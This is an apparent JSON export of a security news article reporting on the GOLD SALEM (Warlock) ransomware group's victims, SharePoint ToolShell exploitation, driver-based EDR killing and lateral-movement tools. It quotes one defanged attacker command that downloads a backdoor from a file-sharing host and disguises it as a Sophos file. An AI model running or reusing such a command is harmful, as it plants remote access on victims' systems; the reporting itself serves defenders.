{"id":126740,"date":"2025-09-18T21:09:49","date_gmt":"2025-09-18T21:09:49","guid":{"rendered":"https:\/\/cybersecuritynews.com\/?p=126740"},"modified":"2025-09-18T21:09:54","modified_gmt":"2025-09-18T21:09:54","slug":"gold-salem-compromise-networks","status":"publish","type":"post","link":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/","title":{"rendered":"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware"},"content":{"rendered":"\n<p>The cyberthreat landscape has witnessed the emergence of another sophisticated ransomware operation as GOLD SALEM, a new threat actor group also known as Warlock Group, has been actively compromising enterprise networks since March 2025.<\/p>\n\n\n\n<p>This emerging ransomware collective has successfully targeted 60 organizations across North America, Europe, and South America, demonstrating competent tradecraft while deploying their custom Warlock ransomware payload.<\/p>\n\n\n\n<p>Microsoft has tracked this group as Storm-2603 and suggests with moderate confidence that it operates from China, though attribution remains inconclusive.<\/p>\n\n\n\n<p>GOLD SALEM has positioned itself strategically within the competitive <a href=\"https:\/\/cybersecuritynews.com\/everest-ransomware-gang-leak-site-hacked\/\" target=\"_blank\" rel=\"noreferrer noopener\">ransomware<\/a> ecosystem by targeting a diverse range of victims, from small commercial entities to large multinational corporations.<\/p>\n\n\n\n<p>The group operates through a sophisticated double-extortion model, utilizing a Tor-based data leak site to publish stolen victim data when ransom demands go unpaid.<\/p>\n\n\n\n<p>Their victim selection appears strategic, largely avoiding targets in China and Russia, though they notably listed a Russian electricity generation services company in September 2025, suggesting potential operations from outside traditional ransomware safe havens.<\/p>\n\n\n\n<p>The threat actors made their public debut through underground forums in June 2025, posting on the RAMP forum to solicit exploits for enterprise applications including Veeam, ESXi, and SharePoint, while seeking tools to disable endpoint detection and response systems.<\/p>\n\n\n\n<p>Sophos analysts <a href=\"https:\/\/news.sophos.com\/en-us\/2025\/09\/17\/gold-salems-warlock-operation-joins-busy-ransomware-landscape\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> the group&#8217;s sophisticated operational security measures and noted their recruitment efforts for initial access brokers, indicating either direct intrusion capabilities or the development of a ransomware-as-a-service model.<\/p>\n\n\n\n<p>GOLD SALEM&#8217;s operational infrastructure demonstrates advanced planning and technical sophistication.<\/p>\n\n\n\n<p>The group maintains countdown timers for each victim, typically allowing 12-14 days for ransom payment before data publication.<\/p>\n\n\n\n<p>As of September 2025, they claim to have sold data from 45% of their victims to private buyers, though these figures may be inflated for psychological impact.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj8MWGS7HjBBpkAxsxK8qeBKZ-ItlA85Tnp8wYbkGdF_m2WuExuzDJehEF0hBAhjFbGxgmTkrf3E5hDJ4_Vk2BpXvE9qGLzVQwe9Z4WfyzUFglQX3H1aG7sMT1kZfRhSfoD6WoMzityICzyvozUN98UDXGavtaeVcAHFNmpnYCSZbjvGWEKLY_32hS8x58\/s16000\/GOLD%20SALEM%20leak%20site%20as%20of%20September%2016,%202025%20(Source%20-%20Sophos).webp\" alt=\"\" \/><figcaption class=\"wp-element-caption\">GOLD SALEM leak site as of September 16, 2025 (Source &#8211; Sophos)<\/figcaption><\/figure><\/div>\n\n\n<p>The group&#8217;s <a href=\"https:\/\/cybersecuritynews.com\/threat-actors-leak-270000-customers-tickets-data\/\" target=\"_blank\" rel=\"noreferrer noopener\">data leak<\/a> site features professional presentation and victim categorization, reflecting their commitment to operational professionalism.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-advanced-evasion-techniques-and-security-bypass-methods\"><strong>Advanced Evasion Techniques and Security Bypass Methods<\/strong><\/h2>\n\n\n\n<p>The technical analysis reveals GOLD SALEM&#8217;s sophisticated approach to <a href=\"https:\/\/cybersecuritynews.com\/best-security-solutions-for-marketers\/\" target=\"_blank\" rel=\"noreferrer noopener\">security solution<\/a> bypass and persistent network access.<\/p>\n\n\n\n<p>The group employs the ToolShell exploit chain targeting SharePoint servers for initial network compromise, leveraging a combination of critical vulnerabilities including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.<\/p>\n\n\n\n<p>Upon successful exploitation, they deploy an ASPX web shell that creates Process objects for cmd[.]exe within the IIS worker process context, enabling remote command execution with output visibility.<\/p>\n\n\n\n<p>A particularly notable technique observed involves their command execution through the <a href=\"https:\/\/cybersecuritynews.com\/chinese-web-shell-whisperer-using-web-shells-tunnels\/\" target=\"_blank\" rel=\"noreferrer noopener\">web shell<\/a>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl - L - o c:\\\\users\\\\public\\\\Sophos\\\\Sophos-UI&#091;.]exe hxxps&#091;:]\/\/filebin&#091;.]net\/j7jqfnh8tn4alzsr\/wsocks&#091;.]exe&#091;.]txt<\/code><\/pre>\n\n\n\n<p>This command downloads a Golang-based WebSockets server, establishing persistent access independent of the initial web shell.<\/p>\n\n\n\n<p>The group demonstrates advanced evasion capabilities through Bring Your Own Vulnerable Driver (BYOVD) techniques, utilizing a renamed vulnerable Baidu Antivirus driver (googleApiUtil64.sys) to exploit CVE-2024-51324 for arbitrary process termination, specifically targeting EDR agents.<\/p>\n\n\n\n<p>Their toolkit includes Mimikatz for credential extraction from LSASS memory, PsExec and Impacket for lateral movement, and Group Policy Object abuse for ransomware deployment across network endpoints.<\/p>\n\n\n\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 89%,rgb(169,184,195) 100%)\"><strong><code><strong><code><strong>Find this Story Interesting! Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener\">X<\/a>\u00a0to Get More Instant Updates<\/strong>.<\/code><\/strong><\/code><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The cyberthreat landscape has witnessed the emergence of another sophisticated ransomware operation as GOLD SALEM, a new threat actor group also known as Warlock Group, has been actively compromising enterprise networks since March 2025. This emerging ransomware collective has successfully targeted 60 organizations across North America, Europe, and South America, demonstrating competent tradecraft while deploying [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":126891,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[11,48],"tags":[149,151],"class_list":{"0":"post-126740","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-security-news","8":"category-threats","9":"tag-cyber-security","10":"tag-cyber-security-news"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v25.7.1 (Yoast SEO v25.7) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware<\/title>\n<meta name=\"description\" content=\"GOLD SALEM (Warlock Group), tracked as Storm-2603, hit 60+ firms across 3 continents since Mar 2025; Microsoft links it to China.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware\" \/>\n<meta property=\"og:description\" content=\"GOLD SALEM (Warlock Group), tracked as Storm-2603, hit 60+ firms across 3 continents since Mar 2025; Microsoft links it to China.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/\" \/>\n<meta property=\"og:site_name\" content=\"Cyber Security News\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Hackingtutorialsandnews\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-18T21:09:49+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-18T21:09:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp\" \/><meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Tushar Subhra Dutta\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:site\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Tushar Subhra Dutta\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware","description":"GOLD SALEM (Warlock Group), tracked as Storm-2603, hit 60+ firms across 3 continents since Mar 2025; Microsoft links it to China.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/","og_locale":"en_US","og_type":"article","og_title":"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware","og_description":"GOLD SALEM (Warlock Group), tracked as Storm-2603, hit 60+ firms across 3 continents since Mar 2025; Microsoft links it to China.","og_url":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/","og_site_name":"Cyber Security News","article_publisher":"https:\/\/www.facebook.com\/Hackingtutorialsandnews","article_published_time":"2025-09-18T21:09:49+00:00","article_modified_time":"2025-09-18T21:09:54+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp","type":"","width":"","height":""},{"width":1600,"height":900,"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp","type":"image\/jpeg"}],"author":"Tushar Subhra Dutta","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp","twitter_creator":"@The_Cyber_News","twitter_site":"@The_Cyber_News","twitter_misc":{"Written by":"Tushar Subhra Dutta","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#article","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/"},"author":{"name":"Tushar Subhra Dutta","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c"},"headline":"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware","datePublished":"2025-09-18T21:09:49+00:00","dateModified":"2025-09-18T21:09:54+00:00","mainEntityOfPage":{"@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/"},"wordCount":499,"publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"image":{"@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#primaryimage"},"thumbnailUrl":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp?w=1600&resize=1600,900&ssl=1","keywords":["cyber security","cyber security news"],"articleSection":["Cyber Security News","Threats"],"inLanguage":"en-US","copyrightYear":"2025","copyrightHolder":{"@id":"https:\/\/cybersecuritynews.com\/#organization"}},{"@type":"WebPage","@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/","url":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/","name":"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#primaryimage"},"image":{"@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#primaryimage"},"thumbnailUrl":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp?w=1600&resize=1600,900&ssl=1","datePublished":"2025-09-18T21:09:49+00:00","dateModified":"2025-09-18T21:09:54+00:00","description":"GOLD SALEM (Warlock Group), tracked as Storm-2603, hit 60+ firms across 3 continents since Mar 2025; Microsoft links it to China.","breadcrumb":{"@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#primaryimage","url":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp?w=1600&resize=1600,900&ssl=1","contentUrl":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp?w=1600&resize=1600,900&ssl=1","width":"1600","height":"900"},{"@type":"BreadcrumbList","@id":"https:\/\/cybersecuritynews.com\/gold-salem-compromise-networks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/cybersecuritynews.com\/"},{"@type":"ListItem","position":2,"name":"GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware"}]},{"@type":"WebSite","@id":"https:\/\/cybersecuritynews.com\/#website","url":"https:\/\/cybersecuritynews.com\/","name":"Cyber Security News","description":"World&#039;s #1 Premier Cybersecurity and Hacking News Portal","publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/cybersecuritynews.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/cybersecuritynews.com\/#organization","name":"Cyber Security News","url":"https:\/\/cybersecuritynews.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/","url":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","contentUrl":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","width":200,"height":200,"caption":"Cyber Security News"},"image":{"@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Hackingtutorialsandnews","https:\/\/x.com\/The_Cyber_News","https:\/\/www.linkedin.com\/company\/cybersecurity-news\/"]},{"@type":"Person","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c","name":"Tushar Subhra Dutta","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","caption":"Tushar Subhra Dutta"},"description":"Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.","url":"https:\/\/cybersecuritynews.com\/author\/tushar\/"}]}},"jetpack_featured_media_url":"https:\/\/i1.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhECVP9WBqLHX38-Pw2qvjIXnRf-1MoNQ0pFl9VeX0w6UpJT1eNZ-WwZBaHE4MPb_rAfM3BOzdYQV8Jb85Jwes2z45aHIq7-qF3QXif0UalMEMhec1l5qk9yJ__UB0o3RjXjE6kz3qN8WJzS0-LzTEfSzkd2Yrxh3f8VGiN6D8uq8l44eU0GckorgsCmJk\/s16000\/GOLD%20SALEM%20Compromise%20Networks%20and%20Bypass%20Security%20Solutions%20to%20Deploy%20Warlock%20Ransomware.webp?w=1600&resize=1600,900&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/126740","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/comments?post=126740"}],"version-history":[{"count":2,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/126740\/revisions"}],"predecessor-version":[{"id":126890,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/126740\/revisions\/126890"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media\/126891"}],"wp:attachment":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media?parent=126740"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/categories?post=126740"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/tags?post=126740"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}